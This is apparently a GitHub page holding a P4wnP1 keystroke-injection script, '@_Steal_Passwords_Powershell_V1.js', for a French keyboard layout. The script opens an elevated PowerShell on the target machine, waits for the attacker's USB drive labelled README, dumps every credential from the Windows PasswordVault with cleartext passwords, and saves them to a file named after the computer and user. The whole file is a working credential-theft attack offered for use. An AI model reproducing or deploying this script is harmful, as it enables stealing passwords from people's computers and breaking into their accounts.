-
Notifications
You must be signed in to change notification settings - Fork 4
Expand file tree
/
Copy path@_Steal_Passwords_Powershell_V1.js
More file actions
93 lines (93 loc) · 1.85 KB
/
Copy path@_Steal_Passwords_Powershell_V1.js
File metadata and controls
93 lines (93 loc) · 1.85 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
layout('fr')
typingSpeed(0,0)
press("GUI r")
delay(200)
type("powershell")
press("CTRL SHIFT ENTER")
delay(1000)
press("SHIFT TAB")
press("ENTER")
delay(3000)
type('$drivefound=$false\n')
type('while (-not $drivefound)\n')
type('{\n')
type(' try\n')
type(' {\n')
type(' $drive=Get-Volume -FileSystemLabel ')
layout('us')
press("3")
layout('fr')
type ('README')
layout('us')
press("3")
layout('fr')
type (' -ErrorAction Stop\n')
type(' }\n')
type(' catch \n')
type(' {\n')
type(' ')
layout('us')
press("3")
layout('fr')
type ('Waiting for P4wnP1 drive')
layout('us')
press("3")
layout('fr')
type ('\n')
type(' sleep 1\n')
type(' continue\n')
type(' } \n')
type(' $dl=($drive.DriveLetter ')
layout('us')
press("RIGHT_ALT 6")
layout('fr')
type (' Out-String)[0] +')
layout('us')
press("3")
layout('fr')
type (':')
layout('us')
press("3")
layout('fr')
type ('\n')
type(' $drivefound=$true\n')
type('}\n')
type('$filename=$dl+')
layout('us')
press("3")
layout('fr')
type ('\\')
layout('us')
press("3")
layout('fr')
type ('+$env:COMPUTERNAME+')
layout('us')
press("3")
layout('fr')
type ('_')
layout('us')
press("3")
layout('fr')
type ('+$env:USERNAME+')
layout('us')
press("3")
layout('fr')
type ('.txt')
layout('us')
press("3")
layout('fr')
type ('\n')
type('\n')
type('[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]\n')
type('$creds = (New-Object Windows.Security.Credentials.PasswordVault).RetrieveAll()\n')
type('foreach ($c in $creds) {$c.RetrievePassword()}\n')
type('$creds ')
layout('us')
press("RIGHT_ALT 6")
layout('fr')
type (' Format-List -Property Resource,UserName,Password ')
layout('us')
press("RIGHT_ALT 6")
layout('fr')
type (' Out-File $filename\n')
type('exit\n')